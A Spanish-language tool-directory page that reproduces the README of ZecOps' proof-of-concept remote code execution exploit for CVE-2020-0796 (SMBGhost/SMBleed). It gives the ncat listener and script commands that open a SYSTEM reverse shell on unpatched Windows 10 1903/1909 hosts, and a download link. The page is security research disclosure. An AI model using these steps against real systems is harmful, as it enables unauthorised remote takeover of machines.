Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-0796-RCE-POC — CVE-2020-0796 Ejecución remota de código POC | Kitploit
Herramientas/GitHubGitHub/jamf/cve-2020-0796-rce-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoArchived
GitHubjamf/cve-2020-0796-rce-poc

CVE-2020-0796-RCE-POC

CVE-2020-0796 Ejecución remota de código POC

Ver Repositorio
573170hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-0796 Prueba de Concepto de Ejecución Remota de Código

(c) 2020 ZecOps, Inc. - https://www.zecops.com - Encuentra los errores de los atacantes
Prueba de Concepto de Ejecución Remota de Código para CVE-2020-0796 / "SMBGhost"
Resultado esperado: Shell inversa con acceso al sistema.
Destinado únicamente para fines educativos y pruebas en entornos corporativos.
ZecOps no asume ninguna responsabilidad por el código, úselo bajo su propio riesgo.
Por favor, contacte a [email protected] si está interesado en herramientas DFIR sin agente para Servidores, Puntos Finales y Dispositivos Móviles para detectar SMBGhost y otros tipos de ataques automáticamente.

Uso

  • Asegúrese de que Python y ncat estén instalados.

  • Ejecute calc_target_offsets.bat en la computadora objetivo y ajuste los offsets al principio del archivo SMBleedingGhost.py según la salida del script (también vea la nota a continuación).

  • Ejecute ncat con los siguientes argumentos de línea de comandos:

    ncat -lvp <port>

    Donde <port> es el número de puerto en el que ncat estará escuchando.

  • Ejecute SMBleedingGhost.py con los siguientes argumentos de línea de comandos:

    SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>

    Donde <target_ip> es la dirección IP de la computadora objetivo vulnerable. <reverse_shell_ip> y <reverse_shell_port> son la dirección IP y el número de puerto en los que ncat está escuchando.

  • Si todo va bien, ncat mostrará una shell que proporciona acceso al sistema de la computadora objetivo.

Nota: Quizás se pregunte por qué es necesario ejecutar el script calc_target_offsets.bat en la computadora objetivo, y si no eso contradice el propósito de que la ejecución remota de código sea remota. Estos offsets no son aleatorios y son los mismos en todas las instancias de Windows de la misma versión. Se podría hacer el ataque más universal detectando la versión de Windows objetivo y ajustando los offsets automáticamente, o prescindiendo de ellos por completo, pero es solo una POC e hicimos lo más simple. También consideramos algo bueno que la POC no sea universal y no sea conveniente para usos distintos a pruebas y educación.

demo

Entorno Objetivo

Las versiones de Windows 10 1903 y 1909 están afectadas. Las versiones sin parche de Windows 10 1903 no son compatibles debido a un error de desreferencia nula en Windows (corregido en KB4512941).

Debido a la naturaleza de la explotación, la POC funciona mejor en objetivos que se ejecutan en una computadora (o una VM) con un solo procesador lógico. Los objetivos con más de un procesador lógico que se ejecutan en VirtualBox también deberían ser compatibles, pero la POC es menos confiable en ese caso. Otros objetivos podrían no ser compatibles. Para más detalles, consulte nuestro informe técnico a continuación.

Informe Técnico

  • Informe SMBleedingGhost Parte I: Encadenando SMBleed (CVE-2020-1206) con SMBGhost
  • Informe SMBleedingGhost Parte II: Lectura de Memoria No Autenticada – Preparando el Terreno para un RCE
  • Informe SMBleedingGhost Parte III: De Lectura Remota (SMBleed) a RCE

Referencias

  • Reproducción de Vulnerabilidad: CVE-2020-0796 POC - Blog de ZecOps
  • CVE-2020-0796 - Centro de Respuesta de Seguridad de Microsoft
  • CVE-2020-1206 - Centro de Respuesta de Seguridad de Microsoft
Descargar herramienta